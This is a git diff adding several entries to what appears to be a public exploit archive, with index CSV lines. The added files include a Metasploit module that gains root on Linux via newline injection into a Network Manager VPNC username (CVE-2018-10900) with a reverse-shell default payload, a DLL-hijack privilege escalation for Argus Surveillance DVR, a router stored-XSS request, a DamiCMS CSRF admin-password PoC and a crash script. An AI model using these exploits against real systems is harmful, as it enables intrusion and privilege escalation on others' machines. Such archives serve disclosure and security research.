diff --git a/exploits/hardware/webapps/45310.txt b/exploits/hardware/webapps/45310.txt new file mode 100644 index 000000000..9a37975bb --- /dev/null +++ b/exploits/hardware/webapps/45310.txt @@ -0,0 +1,33 @@ +# Title: Vox TG790 ADSL Router - Cross-Site Scripting +# Author: Cakes +# Exploit Date: 2018-08-01 +# Vendor: Vox Telecom +# Link: https://www.vox.co.za/ +# Firmware Version: 6.2.W.1 +# CVE: N/A + +# Description +# Due to improper user iunput management low privilege users are able to create +# a persistent Cross-Site scripting attack via the phone book function. + +# PoC +POST /cgi/b/_voip_/phonebook/?be=0&l0=2&l1=1&name= HTTP/1.1 +Host: 192.168.1.254 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +DNT: 1 +Referer: https://192.168.1.254/cgi/b/_voip_/pb/?be=0&l0=2&l1=1&name= +Authorization: Digest username="cakes", realm="SpeedTouch", nonce="0745EHNLF:00-1D-68-52-6C-37:173934:292999", uri="/cgi/b/_voip_/phonebook/?be=0&l0=2&l1=1&name=", response="ab09b54d4b6369496463eb79cfb4b1c2", qop=auth, nc=0000002a, cnonce="8305e26a71dd0ae2" +Connection: close +Content-Type: application/x-www-form-urlencoded +Content-Length: 141 + +0=10&1=&100=Cakes&101=Cakes&102=123123&103=123123123&104=123123&105=123123&106= + +# Response +HTTP/1.0 200 OK +Cache-Control: no-cache +Expires: -1 +Content-Type: text/html \ No newline at end of file diff --git a/exploits/linux/local/45313.rb b/exploits/linux/local/45313.rb new file mode 100755 index 000000000..b196e6a8b --- /dev/null +++ b/exploits/linux/local/45313.rb @@ -0,0 +1,148 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = ExcellentRanking + + include Msf::Post::File + include Msf::Post::Linux::Priv + include Msf::Post::Linux::System + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Network Manager VPNC Username Privilege Escalation', + 'Description' => %q{ + This module exploits an injection vulnerability in the Network Manager + VPNC plugin to gain root privileges. + + This module uses a new line injection vulnerability in the configured + username for a VPN network connection to inject a `Password helper` + configuration directive into the connection configuration. + + The specified helper is executed by Network Manager as root when the + connection is started. + + Network Manager VPNC versions prior to 1.2.6 are vulnerable. + + This module has been tested successfully with VPNC versions: + 1.2.4-4 on Debian 9.0.0 (x64); and + 1.1.93-1 on Ubuntu Linux 16.04.4 (x64). + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Denis Andzakovic', # Discovery and exploit + 'Brendan Coles' # Metasploit + ], + 'DisclosureDate' => 'Jul 26 2018', + 'References' => + [ + ['CVE', '2018-10900'], + ['URL', 'http://seclists.org/oss-sec/2018/q3/51'], + ['URL', 'https://pulsesecurity.co.nz/advisories/NM-VPNC-Privesc'], + ['URL', 'https://gitlab.gnome.org/GNOME/NetworkManager-vpnc/commit/07ac18a32b4'], + ['URL', 'https://security-tracker.debian.org/tracker/CVE-2018-10900'], + ['URL', 'https://people.canonical.com/~ubuntu-security/cve/2018/CVE-2018-10900.html'], + ['URL', 'https://launchpad.net/ubuntu/+source/network-manager-vpnc/0.9.8.6-1ubuntu2.1'], + ['URL', 'https://www.debian.org/security/2018/dsa-4253'], + ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1605919'], + ['URL', 'https://bugzilla.novell.com/show_bug.cgi?id=1101147'] + ], + 'Platform' => 'linux', + 'Arch' => [ARCH_X86, ARCH_X64], + 'SessionTypes' => ['shell', 'meterpreter'], + 'Targets' => [['Auto', {}]], + 'DefaultOptions' => + { + 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp', + 'WfsDelay' => 10, + 'PrependFork' => true + }, + 'DefaultTarget' => 0)) + register_options [ + OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp']) + ] + end + + def base_dir + datastore['WritableDir'].to_s + end + + def upload(path, data) + print_status "Writing '#{path}' (#{data.size} bytes) ..." + rm_f path + write_file path, data + register_file_for_cleanup path + end + + def upload_and_chmodx(path, data) + upload path, data + cmd_exec "chmod +x '#{path}'" + end + + def check + unless command_exists? 'nmcli' + vprint_error 'Network Manager nmcli utility is not installed' + return CheckCode::Safe + end + vprint_good 'nmcli utility is installed' + + CheckCode::Detected + end + + def exploit + if is_root? + fail_with Failure::BadConfig, 'Session already has root privileges' + end + + if check != CheckCode::Detected + fail_with Failure::NotVulnerable, 'Target is not vulnerable' + end + + @payload_name = ".#{rand_text_alphanumeric rand(10..15)}" + payload_path = "#{base_dir}/#{@payload_name}" + + print_status 'Adding VPN connection...' + vpn_data = [] + vpn_data << '+vpn.data "IKE DH Group = dh2"' + vpn_data << "+vpn.data 'IPSec ID = #{rand_text_alphanumeric 5..10}'" + vpn_data << '+vpn.data "IPSec gateway = 127.0.0.1"' + vpn_data << '+vpn.data "IPSec secret-flags = 4"' + vpn_data << '+vpn.data "Local Port = 0"' + vpn_data << '+vpn.data "NAT Traversal Mode = natt"' + vpn_data << '+vpn.data "Perfect Forward Secrecy = server"' + vpn_data << '+vpn.data "Vendor = cisco"' + vpn_data << '+vpn.data "Xauth password-flags = 4"' + vpn_data << "+vpn.data \"Xauth username = #{rand_text_alphanumeric 5..10}\nPassword helper #{payload_path}\"" + vpn_data << "+vpn.data 'ipsec-secret-type = #{rand_text_alphanumeric 5..10}'" + vpn_data << "+vpn.data 'xauth-password-type = #{rand_text_alphanumeric 5..10}'" + res = cmd_exec "nmcli connection add con-name #{@payload_name} type vpn ifname '*' vpn-type vpnc -- #{vpn_data.join(' ')}" + if res.include? 'Error' + fail_with Failure::Unknown, 'Could not create VPN connection' + end + + res = cmd_exec 'nmcli connection' + unless res.include? @payload_name + fail_with Failure::Unknown, 'Could not create VPN connection' + end + + print_status 'Uploading payload...' + upload_and_chmodx payload_path, generate_payload_exe + + print_status 'Starting VPN connection...' + cmd_exec "nmcli connection up #{@payload_name} & echo " + end + + def cleanup + print_status 'Removing VPN connection...' + res = cmd_exec "nmcli connection delete #{@payload_name}" + unless res.include? 'successfully deleted' + print_warning "Could not remove VPN connection #{@payload_name}" + end + super + end +end \ No newline at end of file diff --git a/exploits/php/webapps/45314.txt b/exploits/php/webapps/45314.txt new file mode 100644 index 000000000..d0e62c156 --- /dev/null +++ b/exploits/php/webapps/45314.txt @@ -0,0 +1,28 @@ +# Exploit Title: DamiCMS 6.0.0 - Cross-Site Request Forgery (Change Admin Password) +# Author: Autism_JH +# Date: 2018-08-30 +# Vendor Homepage: https://github.com/731276192/damicms +# Software Link: https://github.com/731276192/damicms +# Version: 6.0.0 +# CVE: CVE-2018-15844 + +# Description: +# DamiCMS v6.0.0 allows CSRF to change the administrator account's pssword. +# After the administrator login in,open the poc,the administrator account's +# password will been changed to 123123 + +# POC: + + + + +
+ + + + + + +
+ + \ No newline at end of file diff --git a/exploits/windows_x86-64/dos/45311.py b/exploits/windows_x86-64/dos/45311.py new file mode 100755 index 000000000..bf48a35eb --- /dev/null +++ b/exploits/windows_x86-64/dos/45311.py @@ -0,0 +1,27 @@ +# Exploit Title: Acunetix WVS Reporter 10.0 - Denial of Service (PoC) +# Exploit Author: Ali Alipour +# Date: 2018-08-22 +# Vendor Homepage : https://www.acunetix.com/ +# Tested on : Windows 10 - 64-bit + +# Steps to Reproduce +# Run the python exploit script, it will create a new +# file with the name "exploit.txt" just copy the text inside "exploit.txt" +# and start the Acunetix WVS Reporter 10.0 program. +# In the new window click "Report Preview" > "Load Report". +# And upload a sample report >> Then click on the print button . +# Now Paste the content of "exploit.txt" into the field: " Pages ". +# Click "OK" and you will see a Crash. + +#!/usr/bin/python + +buffer = "A" * 20 +payload = buffer +try: + f=open("exploit.txt","w") + print "[+] Creating %s bytes evil payload.." %len(payload) + f.write(payload) + f.close() + print "[+] File created!" +except: + print "File cannot be created" \ No newline at end of file diff --git a/exploits/windows_x86/local/45312.c b/exploits/windows_x86/local/45312.c new file mode 100644 index 000000000..d8f12fd24 --- /dev/null +++ b/exploits/windows_x86/local/45312.c @@ -0,0 +1,56 @@ +# Exploit Title: Argus Surveillance DVR 4.0.0.0 - Privilege Escalation +# Author: John Page (aka hyp3rlinx) +# Date: 2018-08-29 +# Vendor: Argus Surveillance DVR - 4.0.0.0 +# Software Link: http://www.argussurveillance.com/download/DVR_stp.exe +# CVE: N/A +# Tested on: Windows 7 x86 + +# Description: +# Argus Surveillance DVR 4.0.0.0 devices allow Trojan File SYSTEM Privilege Escalation. +# Placing a Trojan File DLL named "gsm_codec.dll" in Argus application directory will +# lead to arbitrary code execution with SYSTEM integrity +# Affected Component: DVRWatchdog.exe + +# Exploit/POC +# Create DLL 32bit DLL named "gsm_codec.dll" and place in App Dir, +# launch Argus DVR tada! your now SYSTEM. + +#include + +/* hyp3rlinx */ + +/* +gcc -c -m32 gsm_codec.c +gcc -shared -m32 -o gsm_codec.dll gsm_codec.o +*/ + +void systemo(){ + MessageBox( 0, "3c184981367094fce3ab70efc3b44583" , "philbin :)" , MB_YESNO + MB_ICONQUESTION ); +} + +BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason,LPVOID lpvReserved){ + switch(fdwReason){ + case DLL_PROCESS_ATTACH:{ + systemo(); + break; + } + case DLL_PROCESS_DETACH:{ + systemo(); + break; + } + case DLL_THREAD_ATTACH:{ + systemo(); + break; + } + case DLL_THREAD_DETACH:{ + systemo(); + break; + } + } + + return TRUE; +} + +# https://vimeo.com/287115698 +# Greetz: ***Greetz: indoushka | Eduardo | GGA*** \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index ba9606898..d0d63efd2 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6086,6 +6086,7 @@ id,file,description,date,author,type,platform,port 45301,exploits/windows_x86-64/dos/45301.py,"Trillian 6.1 Build 16 - _Sign In_ Denial of service (PoC)",2018-08-29,"Jose Miguel Gonzalez",dos,windows_x86-64, 45302,exploits/windows_x86-64/dos/45302.py,"NetworkActiv Web Server 4.0 Pre-Alpha-3.7.2 - 'Username' Denial of Service (PoC)",2018-08-30,"Victor Mondragón",dos,windows_x86-64, 45304,exploits/windows_x86-64/dos/45304.py,"Nord VPN 6.14.31 - Denial of Service (PoC)",2018-08-30,L0RD,dos,windows_x86-64, +45311,exploits/windows_x86-64/dos/45311.py,"Acunetix WVS Reporter 10.0 - Denial of Service (PoC)",2018-08-31,"Ali Alipour",dos,windows_x86-64, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -9926,6 +9927,8 @@ id,file,description,date,author,type,platform,port 45280,exploits/windows/local/45280.txt,"Microsoft Windows - Advanced Local Procedure Call (ALPC) Local Privilege Escalation",2018-08-28,SandboxEscaper,local,windows, 45288,exploits/linux/local/45288.py,"SIPP 3.3 - Stack-Based Buffer Overflow",2018-08-29,"Juan Sacco",local,linux, 45289,exploits/windows/local/45289.py,"R 3.4.4 - Buffer Overflow (SEH)",2018-08-29,ZwX,local,windows, +45312,exploits/windows_x86/local/45312.c,"Argus Surveillance DVR 4.0.0.0 - Privilege Escalation",2018-08-31,hyp3rlinx,local,windows_x86, +45313,exploits/linux/local/45313.rb,"Network Manager VPNC - Username Privilege Escalation (Metasploit)",2018-08-31,Metasploit,local,linux, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -39902,3 +39905,5 @@ id,file,description,date,author,type,platform,port 45306,exploits/hardware/webapps/45306.txt,"DLink DIR-601 - Credential Disclosure",2018-08-30,"Kevin Randall",webapps,hardware, 45307,exploits/php/webapps/45307.txt,"WordPress Plugin Quizlord 2.0 - Cross-Site Scripting",2018-08-30,"Renos Nikolaou",webapps,php, 45309,exploits/windows_x86-64/webapps/45309.txt,"Cybrotech CyBroHttpServer 1.0.3 - Cross-Site Scripting",2018-08-30,"Emre ÖVÜNÇ",webapps,windows_x86-64, +45310,exploits/hardware/webapps/45310.txt,"Vox TG790 ADSL Router - Cross-Site Scripting",2018-08-31,cakes,webapps,hardware, +45314,exploits/php/webapps/45314.txt,"DamiCMS 6.0.0 - Cross-Site Request Forgery (Change Admin Password)",2018-08-31,Autism_JH,webapps,php,